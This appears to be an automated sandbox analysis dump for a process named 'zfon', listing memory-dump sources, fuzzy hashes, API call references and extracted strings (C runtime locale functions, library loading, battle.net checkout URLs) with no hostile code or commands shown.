                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 2003779279-1866435925
                                                                                                                                                                            • Opcode ID: 8de342f0291e80d733e627eaf939c61c9f2c4bc02dc7a8bd2179287c94fe2617
                                                                                                                                                                            • Instruction ID: 2f3254ce09e9dae583c2b9dc5ac54ec82b8d132a21c8a97b5786dc2c99316318
                                                                                                                                                                            • Opcode Fuzzy Hash: 8de342f0291e80d733e627eaf939c61c9f2c4bc02dc7a8bd2179287c94fe2617
                                                                                                                                                                            • Instruction Fuzzy Hash: 255185B6A0890582EF24DF28D49137A6760FB45F98F54A135DA1EA37B5DF3CE492CB00
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B558CB
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B55903
                                                                                                                                                                            • _Getvals.LIBCPMT ref: 00007FFBC1B5593C
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B55A16
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                                                                                            • API String ID: 801482897-3573081731
                                                                                                                                                                            • Opcode ID: 08f4393cbb9286a77c8465830587d0892ef895849c8ce4b697314d7c6ad679fd
                                                                                                                                                                            • Instruction ID: 7a31320c74e367318f5d219f39f56280f2e5cf3d4a0faa1a2adfa282bab0be9a
                                                                                                                                                                            • Opcode Fuzzy Hash: 08f4393cbb9286a77c8465830587d0892ef895849c8ce4b697314d7c6ad679fd
                                                                                                                                                                            • Instruction Fuzzy Hash: E551DEBAA08B8186E724CF30D59056E7BB0FB46BA1B142235CB9A53794DB3CE485CB00
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B55723
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5575B
                                                                                                                                                                            • _Getvals.LIBCPMT ref: 00007FFBC1B55794
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B5586E
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                                                                                            • API String ID: 801482897-3573081731
                                                                                                                                                                            • Opcode ID: 9c08d5fc2ba6d1f9c895b19a1ef2ef9da669aab50d1ee5f16d3dedc8da72be6f
                                                                                                                                                                            • Instruction ID: 5743fc2315ae1ebc6a1607840c8a7fee26c8b02fcd2d4fd3b4617e766fbe98da
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c08d5fc2ba6d1f9c895b19a1ef2ef9da669aab50d1ee5f16d3dedc8da72be6f
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B51CEBAA08B81CAE765CF30D99046E7BA4FB45F91B146235CFA953794DF38E485CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B17069
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B17077
                                                                                                                                                                            • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B17090
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B170A2
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B17110
                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FFBC1B171A3,?,?,00000000,00007FFBC1B16FD4,?,?,?,?,00007FFBC1B16D11), ref: 00007FFBC1B1711C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                            • API String ID: 916704608-2084034818
                                                                                                                                                                            • Opcode ID: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                                                                                                            • Instruction ID: ac9de12ff600e4cfa20f21aa2dbfcc4e3212f960197166870058849a06d98ac6
                                                                                                                                                                            • Opcode Fuzzy Hash: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C31A169B1A74291EF15DF22D804A772394BF0CFA0F2A6935ED1D67350EE3CE5458B00
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B03665
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B03673
                                                                                                                                                                            • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B0368C
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B0369E
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B0370C
                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FFBC1B0379F,?,?,00000000,00007FFBC1B035D0,?,?,?,?,00007FFBC1B0334D), ref: 00007FFBC1B03718
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                            • API String ID: 916704608-2084034818
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initstd::ios_base::_$AddstdExceptionThrowstd::ios_base::failure::failurestd::locale::_
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 792165947-1866435925
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • _W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B4C3EE
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4C40B
                                                                                                                                                                            • _W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B4C42B
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B4C448
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B739
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B768
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: memcpy.VCRUNTIME140(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B77F
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FFBC1B4C453
                                                                                                                                                                            • :AM:am:PM:pm, xrefs: 00007FFBC1B4C464
                                                                                                                                                                            • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B4C416
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
                                                                                                                                                                            • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                            • API String ID: 1539549574-3743323925
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memmove$freemallocmemcpy
                                                                                                                                                                            • String ID: https://www.battle.net/shop/simplecheckout/debug-harness$https://www.battle.net/shop/simplecheckout/error$https://www.battle.net/shop/simplecheckout/loading$https://www.battle.net/shop/simplecheckout/navbar
                                                                                                                                                                            • API String ID: 343939323-4034954138
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$AdjustPointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1501936508-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$AdjustPointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1501936508-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentThread$Xtime_diff_to_millis2xtime_get
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3218647749-0
                                                                                                                                                                            • Opcode ID: 6f3bf3e151121cb8b9efbec79e646c9e8da7cfbfd622af188c552a0e09985615
                                                                                                                                                                            • Instruction ID: 845375d6ae78d517a152e2368f1cee9fda818b0a564482adf0bc1b855c2ac995
                                                                                                                                                                            • Opcode Fuzzy Hash: 6f3bf3e151121cb8b9efbec79e646c9e8da7cfbfd622af188c552a0e09985615
                                                                                                                                                                            • Instruction Fuzzy Hash: 774111B9908A4287EB608F36D48427B73B1EB49B44F50A075DA4E726A1DF3DE885CF14
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: 7bf056c13a2da99b91ea4627273c8a9152c289f73d6bb08a8926818adde8cdeb
                                                                                                                                                                            • Instruction ID: d2dd9cfb73150b24e0fc8dd71c6ee6341ec0e98fa997fdb2d26850c4fe0cb572
                                                                                                                                                                            • Opcode Fuzzy Hash: 7bf056c13a2da99b91ea4627273c8a9152c289f73d6bb08a8926818adde8cdeb
                                                                                                                                                                            • Instruction Fuzzy Hash: B6F00722A1448B90EEB4FBB0E4D29F85321AF64B14FC40931D60D850DB9F14DD57C3A1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c0d964228e62662dd69238403e01b8c967a136a32bf0b3cf5687f910d97fee5f
                                                                                                                                                                            • Instruction ID: cecc932bf2cae85c3bb82ffe64d8aeb671104c687f45f3c1c3ec20c4fad8d676
                                                                                                                                                                            • Opcode Fuzzy Hash: c0d964228e62662dd69238403e01b8c967a136a32bf0b3cf5687f910d97fee5f
                                                                                                                                                                            • Instruction Fuzzy Hash: 95E15A33A09B8689EB20DF34E8802ADB7B5FB44788F848535DA8D47B69EF38D554C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID: document.body.scrollLeft = $document.body.scrollTop =
                                                                                                                                                                            • API String ID: 3041573648-1848242717
                                                                                                                                                                            • Opcode ID: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                                                                                            • Instruction ID: 5ea6efe9066405865dedbdc8b8d0dfcedcf80521cb4926afdf0de2fb62322c7c
                                                                                                                                                                            • Opcode Fuzzy Hash: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                                                                                            • Instruction Fuzzy Hash: B2717333708A8285EF20AB75E4503AEA772FB85B84F845136EA8D47A99DF3CD545C710
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B6291B
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B62953
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B62A66
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FD76
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FD93
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FDC9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FDF4
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE11
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE3A
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE72
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5F930: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B5F93B
                                                                                                                                                                              • Part of subcall function 00007FFBC1B5F930: __crtGetLocaleInfoEx.LIBCPMT ref: 00007FFBC1B5F955
                                                                                                                                                                            Strings
